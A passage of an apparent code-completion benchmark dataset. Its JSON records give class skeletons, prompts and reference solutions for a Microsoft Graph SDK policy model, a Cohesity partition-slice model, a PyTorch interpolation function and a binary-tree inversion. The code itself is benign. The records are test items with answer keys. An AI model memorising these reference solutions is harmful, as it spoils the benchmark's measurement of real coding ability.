'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000237", "length_bytes": 5220, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `UnifiedRoleManagementPolicy` described below.\n\nClass description:\nImplement the UnifiedRoleManagementPolicy class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `UnifiedRoleManagementPolicy` described below.\n\nClass description:\nImplement the UnifiedRoleManagementPolicy class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass UnifiedRoleManagementPolicy:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UnifiedRoleManagementPolicy:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> UnifiedRoleManagementPolicy:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: UnifiedRoleManagementPolicy\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return UnifiedRoleManagementPolicy()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n from .entity import Entity\n from .identity import Identity\n from .unified_role_management_policy_rule import UnifiedRoleManagementPolicyRule\n fields: Dict[str, Callable[[Any], None]] = {'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'effectiveRules': lambda n: setattr(self, 'effective_rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'isOrganizationDefault': lambda n: setattr(self, 'is_organization_default', n.get_bool_value()), 'lastModifiedBy': lambda n: setattr(self, 'last_modified_by', n.get_object_value(Identity)), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'rules': lambda n: setattr(self, 'rules', n.get_collection_of_object_values(UnifiedRoleManagementPolicyRule)), 'scopeId': lambda n: setattr(self, 'scope_id', n.get_str_value()), 'scopeType': lambda n: setattr(self, 'scope_type', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_collection_of_object_values('effectiveRules', self.effective_rules)\n writer.write_bool_value('isOrganizationDefault', self.is_organization_default)\n writer.write_object_value('lastModifiedBy', self.last_modified_by)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_collection_of_object_values('rules', self.rules)\n writer.write_str_value('scopeId', self.scope_id)\n writer.write_str_value('scopeType', self.scope_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/unified_role_management_policy.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "c22612ba9a20e5bf9210ea82855f030e48f166bf", "bodies": ["self.disk_file_name = disk_file_name\nself.length = length\nself.lvm_data_offset = lvm_data_offset\nself.offset = offset\nself.partition_number = partition_number", "if dictionary is None:\n return None\ndisk_file_name = dictionary.get('diskFileName')\nlength = dictionary.get('length')\nlvm_data_offset = dictionary.get('lvmDataOffset')\noffset = dictionary.get('offset')\npartition_number = dictionary.get('partitionNumber')\nreturn cls(disk_file_name, length, lvm_data_offset, offset, partition_number)"], "bodies_text": "<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This", "class_name": "DeviceTree_PartitionSlice", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000238", "length_bytes": 3020, "license_type": "permissive", "methods": [{"docstring": "Constructor for the DeviceTree_PartitionSlice class", "name": "__init__", "signature": "def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `DeviceTree_PartitionSlice` described below.\n\nClass description:\nImplementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\n\nMethod signatures and docstrings:\n- def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None): Constructor for the DeviceTree_PartitionSlice class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `DeviceTree_PartitionSlice` described below.\n\nClass description:\nImplementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\n\nMethod signatures and docstrings:\n- def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None): Constructor for the DeviceTree_PartitionSlice class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceTree_PartitionSlice:\n \"\"\"Implementation of the 'DeviceTree_PartitionSlice' model. TODO: type description here. Attributes: disk_file_name (string): The disk to use. length (long|int): The length of data for the LVM volume (for which this device tree is being built) in bytes. It does not include size of the LVM meta data. lvm_data_offset (long|int): Each LVM partition starts with LVM meta data. After the meta data there can be data for one or more LVM volumes. This field indicates the offset in bytes (relative to partition) where data for various LVM volumes starts on the partition. NOTE: If this device tree represents first LVM volume on the partition, 'lvm_data_offset' is equal to 'offset'. offset (long|int): This\"\"\"\n\n def __init__(self, disk_file_name=None, length=None, lvm_data_offset=None, offset=None, partition_number=None):\n \"\"\"Constructor for the DeviceTree_PartitionSlice class\"\"\"\n self.disk_file_name = disk_file_name\n self.length = length\n self.lvm_data_offset = lvm_data_offset\n self.offset = offset\n self.partition_number = partition_number\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n disk_file_name = dictionary.get('diskFileName')\n length = dictionary.get('length')\n lvm_data_offset = dictionary.get('lvmDataOffset')\n offset = dictionary.get('offset')\n partition_number = dictionary.get('partitionNumber')\n return cls(disk_file_name, length, lvm_data_offset, offset, partition_number)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/device_tree_partition_slice.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "9fb86ebe3ca0bc2e40dc831f0a0507f6da6702e6", "bodies": ["B, c, m = features.size()\nn = idx.size(1)\nctx.three_interpolate_for_backward = (idx, weight, m)\nreturn _ext.three_interpolate(features, idx, weight)", "idx, weight, m = ctx.three_interpolate_for_backward\ngrad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\nreturn (grad_features, None, None)"], "bodies_text": "<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ThreeInterpolate", "detected_licenses": ["Unlicense"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000239", "length_bytes": 15763, "license_type": "permissive", "methods": [{"docstring": "Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features", "name": "forward", "signature": "def forward(ctx, features, idx, weight)"}, {"docstring": "Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None", "name": "backward", "signature": "def backward(ctx, grad_out)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001108", "prompt": "Implement the Python class `ThreeInterpolate` described below.\n\nClass description:\nImplement the ThreeInterpolate class.\n\nMethod signatures and docstrings:\n- def forward(ctx, features, idx, weight): Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\n- def backward(ctx, grad_out): Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None", "prompted_full_text": "Implement the Python class `ThreeInterpolate` described below.\n\nClass description:\nImplement the ThreeInterpolate class.\n\nMethod signatures and docstrings:\n- def forward(ctx, features, idx, weight): Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\n- def backward(ctx, grad_out): Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\n\n<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "revision_id": "c0eecf2223c3c28d048d816fd239c118b8568dcf", "skeleton": "<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ThreeInterpolate:\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weight linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of ouputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n", "source": "the_stack_v2_python_sparse", "source_path": "pointcloud/pointnet2/utils/pointnet2_utils.py", "source_repo": "WangLi2019Gt/qpu_code", "split": "test", "star_events_count": 0} {"blob_id": "301d75a534aea9eefb43b223f8f8041d56b2cd13", "bodies": ["if not root:\n return None\nleft = self.invertTree(root.left)\nright = self.invertTree(root.right)\nroot.left = right\nroot.right = left\nreturn root", "if not root:\n return None\nq = deque([root])\nwhile len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000240", "length_bytes": 1056, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: TreeNode Recursive solution", "name": "invertTree", "signature": "def invertTree(self, root)"}, {"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "invertTree1", "signature": "def invertTree1(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005908", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def invertTree(self, root): :type root: TreeNode :rtype: TreeNode Recursive solution\n- def invertTree1(self, root): :type root: TreeNode :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def invertTree(self, root): :type root: TreeNode :rtype: TreeNode Recursive solution\n- def invertTree1(self, root): :type root: TreeNode :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "revision_id": "385ca03d51c8892eccf9ca5b920158d569edc375", "skeleton": "<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive 